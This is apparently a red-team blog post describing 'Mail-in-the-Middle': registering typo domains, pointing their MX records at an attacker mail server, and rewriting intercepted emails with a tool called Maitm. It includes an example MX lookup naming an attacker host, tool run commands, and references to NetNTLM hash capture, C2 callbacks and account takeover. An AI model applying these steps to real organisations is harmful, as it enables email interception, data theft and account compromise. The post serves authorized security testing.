In the chilly month of December 2023, my colleagues Jason (@BreakerOfSigns), Szymon (@TH3_GOAT_FARM3R), and myself (@felmoltor) were on a red team. This one was tough, but we had fun. We had to be a bit more creative than I am used to and two interesting things were done that are worth sharing:
I cannot speak in first person about the physical breakin beyond praising the excellent social engineering skills of both of my colleagues, but I can talk about Mail-in-the-Middle.
First, let me explain what is Mail-in-the-Middle and how we approached it.
The idea is simple; take advantage of the typos that people make when they enter email addresses. If we positioned ourselves in between the sender of an email (be it a person or a system) and the legitimate recipient, we may be able to capture plenty of information about the business, including personally identifiable information, email verification processes, etc. This scenario is effectively a Person-in-the-Middle (PiTM), but for email communications.
Some examples of how being positioned in the middle of email communications could be useful include:
In summary, doing this would be similar to receiving an Amazon package wrongly delivered to you, swapping the Rolex inside the package with the Casio, repackaging it, and leaving the parcel on your neighbours doorstep (hoping they don’t notice).
The original idea of doing this mail interception manually was not ours (Szymon, Jason, or Felipe), but it was rather passed down from previous generations of SensePost to us (thank you Willem), and probably has been by many others out there. What we are presenting here is an improvement on the process and the automation of it.
Back to the point, to achieve a Mail-in-the-Middle position, there are three basic steps:
I like to call these “Stranded Emails”, just because I am a fan of Death Stranding and I am not a native English speaker, so I just make up words to sound like an intellectual.
The architecture of this setup is illustrated in the diagram below:
The green envelope is the original email sent to the wrong domain (mircosoft.com). The handsome hacker would catch that email, extract any sensitive information, if any or modify it and forward on.
All this sounds a bit cumbersome to do manually. Hence, this is where the tool Mail-in-the-Middle can help you, which automates this process.
Let’s dig into how to set up the environment and use the tool.
As I’ve mentioned before, registering domains that are typo’s of the target’s domain (mostly domains that you would type if you fat-fingered an email address) is key. There are tools, such as dnstwist that can help you with discovering good domains to look at. For example, if the target was mydomain.com, you would register domains like mydoain.com, mydomian.com or mdyomian.com.
Once we have registered a good number of these domains, we set the MX DNS records of all these domains to point to our mailbox. Following on our earlier example, querying the MX records of the domain using dig would return something like the following (a good tip to check for this if you are on the blue team and suspect something weird is going on!):
$ dig mydoain.com mx +short 10 mail.attacker.com.
Now, configure a catch-all rule on the server to forward any email coming to a non-existent recipient to another trap email, for example to [email protected].
With a catch-all configured, if I go to our servers webmail, I often see plenty of rubbish and spam clogging my inbox. This is a good sign, the catch-all rule is working. You could expect like 5% of these emails to be useful (aka: not spam).
The objective of Maitm is to reduce my workload by automating the delivery of the spear-phishing style campaigns at scale.
The main ingredients of my tool were a handful of imap-tools, a pinch of discord-webhook and a spoonful of BeautifulSoup4. We mix all this magic in a hot pot and now the attacker can rely on a script to do automatic email modification and forwarding to intended users, all while they are relaxing:
Simply put, the script is an infinite loop with the following logic:
Depending on the configuration you have set, the flow should be similar to the following:
Now that you know the general flow and functionality of Maitm, you just need it to run.
The usage of the script requires you to tweak the yaml formatted configuration file (config/config.yml). This file contains the name of other files with a subset of configurations, such as “auth.yml”, “filter.yml”, “typos.yml”, “injections.yml”, etc. By editing these configuration files you would be able to adapt the tool to your needs as described before. For the full details of how to configure and run the tool, refer to the github project README.
Once configured, there are two ways you can run the tool, either by creating the virtual environment with pipenv or running it via Docker. Using it via Docker would be as easy as executing:
docker build -t maitm . # Build
docker run --rm -ti maitm -h # To get help
docker run --rm -ti maitm -c config/config.yml -f –n
When you run Maitm on your server, you should see something like this in the console:
When an email is forwarded and you have configured Discord or Teams, you will receive a message like this when some activity happens:
I also created another script to report a hit from a tracking pixel via Discord. For it to work you need to install the Apache mod forensics module and modify the path of your log file (variable LOG_FILE) where the script watching. You also need to create an .env file containing the discord webhook URL in the DISCORD_WEBHOOK variable.
Leave this script running in background and when a recipient receives a email (and if the user allowed remote content to be displayed in the email client) you should get a hit on your tracking pixel and will be notified like this:
If you are lucky, after every one of these notifications, you will receive a NetNTLM hash on your server and, hoping the recipient has executed your attachment (assuming you’ve configured that), a new agent connection to your C2 infrastructure.
When we think about the security implications of typo’d domains, we immediately think of phishing sent from that domain to our business, but we forget about the implications of the emails sent to that typo’d domain.
Setting up infrastructure that catches “stranded emails” as an attacker is a powerful attack piivimite. The emails sent to these domains often contain a trove of sensitive data, which could include Personally Identifiable Information (PII), business infrastructure information, business meeting invites, bills, etc. Attackers can take advantage of this to great effect by performing many actions such as completing employee enrolments or password resets on specific business-owned platforms, effectively leading to account takeovers. In my last Red Team we had good success with this, and almost surely you can put it in practice in yours as well.
Having a tool deal with “stranded email” monitoring, link and attachment replacement and more takes a significant workload off your shoulders, leaving you with more time to focus on other aspects of your testing. That, and sometimes when email delivery is fast (right after clicking that password reset button), it’s less suspicious :)
Mitigating these kinds of attacks, from a business perspective, requires a multi-faceted approach. It’s not always possible to prevent human errors when typing email addresses or registering people in third-party web applications linked with your business. Some procedures and mechanisms to consider include:
Use the tool in your engagements and let me know how it goes.
Happy hunting!